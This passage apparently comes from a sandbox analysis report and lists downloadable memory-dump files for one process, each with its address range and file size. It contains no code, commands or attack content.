Filesize
5.9MB

Download
memory/5708-481-0x00007FFA0DE90000-0x00007FFA0DEA4000-memory.dmp

Filesize
80KB

Download
memory/5708-482-0x00007FFA1A150000-0x00007FFA1A15D000-memory.dmp

Filesize
52KB

Download
memory/5708-403-0x00007FFA0CCA0000-0x00007FFA0CE10000-memory.dmp

Filesize
1.4MB

Download
memory/5708-479-0x00007FFA09850000-0x00007FFA09908000-memory.dmp

Filesize
736KB

Download
memory/5708-267-0x00007FFA095C0000-0x00007FFA096DC000-memory.dmp

Filesize
1.1MB

Download
memory/5708-171-0x00007FFA0DEB0000-0x00007FFA0DEDD000-memory.dmp

Filesize
180KB

Download
memory/5708-172-0x00007FFA0EC00000-0x00007FFA0EC19000-memory.dmp

Filesize
100KB

Download
memory/5708-174-0x00007FFA0DDC0000-0x00007FFA0DDE3000-memory.dmp

Filesize
140KB

Download
memory/5708-162-0x00007FFA0E210000-0x00007FFA0E234000-memory.dmp

Filesize
144KB

Download
memory/5708-163-0x00007FFA1FF00000-0x00007FFA1FF0F000-memory.dmp

Filesize
60KB

Download
memory/5708-470-0x00007FFA0E210000-0x00007FFA0E234000-memory.dmp

Filesize
144KB

Download
memory/5708-471-0x00007FFA1FF00000-0x00007FFA1FF0F000-memory.dmp

Filesize
60KB

Download
memory/5708-465-0x00007FFA0C920000-0x00007FFA0CC95000-memory.dmp

Filesize
3.5MB

Download
memory/5708-483-0x00007FFA095C0000-0x00007FFA096DC000-memory.dmp

Filesize
1.1MB

Download
memory/5708-406-0x00007FFA0D090000-0x00007FFA0D0BE000-memory.dmp

Filesize
184KB

Download
memory/5708-407-0x00007FFA0C920000-0x00007FFA0CC95000-memory.dmp

Filesize
3.5MB

Download
memory/5708-408-0x00007FFA09850000-0x00007FFA09908000-memory.dmp

Filesize
736KB

Download
memory/5708-397-0x00007FFA0A4D0000-0x00007FFA0AAB9000-memory.dmp

Filesize
5.9MB

Download
memory/5708-183-0x00007FFA0D090000-0x00007FFA0D0BE000-memory.dmp

Filesize
184KB

Download
memory/5708-257-0x00007FFA0E2B0000-0x00007FFA0E2C9000-memory.dmp

Filesize
100KB

Download
memory/5708-261-0x00007FFA09850000-0x00007FFA09908000-memory.dmp

Filesize
736KB

Download
memory/5708-262-0x00007FFA0C920000-0x00007FFA0CC95000-memory.dmp

Filesize
3.5MB

Download
memory/5708-182-0x00007FFA1D6A0000-0x00007FFA1D6AD000-memory.dmp

Filesize
52KB

Download
memory/5708-179-0x00007FFA0E2B0000-0x00007FFA0E2C9000-memory.dmp

Filesize
100KB

Download
memory/5708-188-0x00007FFA0C920000-0x00007FFA0CC95000-memory.dmp

Filesize
3.5MB

Download
memory/5708-187-0x00007FFA09850000-0x00007FFA09908000-memory.dmp

Filesize
736KB

Download
memory/5708-186-0x00007FFA0A4D0000-0x00007FFA0AAB9000-memory.dmp

Filesize
5.9MB

Download
memory/5708-206-0x00007FFA095C0000-0x00007FFA096DC000-memory.dmp

Filesize
1.1MB

Download
memory/5708-198-0x00007FFA1A150000-0x00007FFA1A15D000-memory.dmp

Filesize
52KB

Download
memory/5708-197-0x00007FFA0DE90000-0x00007FFA0DEA4000-memory.dmp

Filesize
80KB

Download
memory/5708-196-0x00007FFA0E210000-0x00007FFA0E234000-memory.dmp

Filesize
144KB

Download
memory/5708-221-0x00007FFA0DDC0000-0x00007FFA0DDE3000-memory.dmp

Filesize
140KB

Download
memory/5708-224-0x00007FFA0CCA0000-0x00007FFA0CE10000-memory.dmp

Filesize
1.4MB

Download
memory/5708-260-0x00007FFA0D090000-0x00007FFA0D0BE000-memory.dmp

Filesize
184KB

Download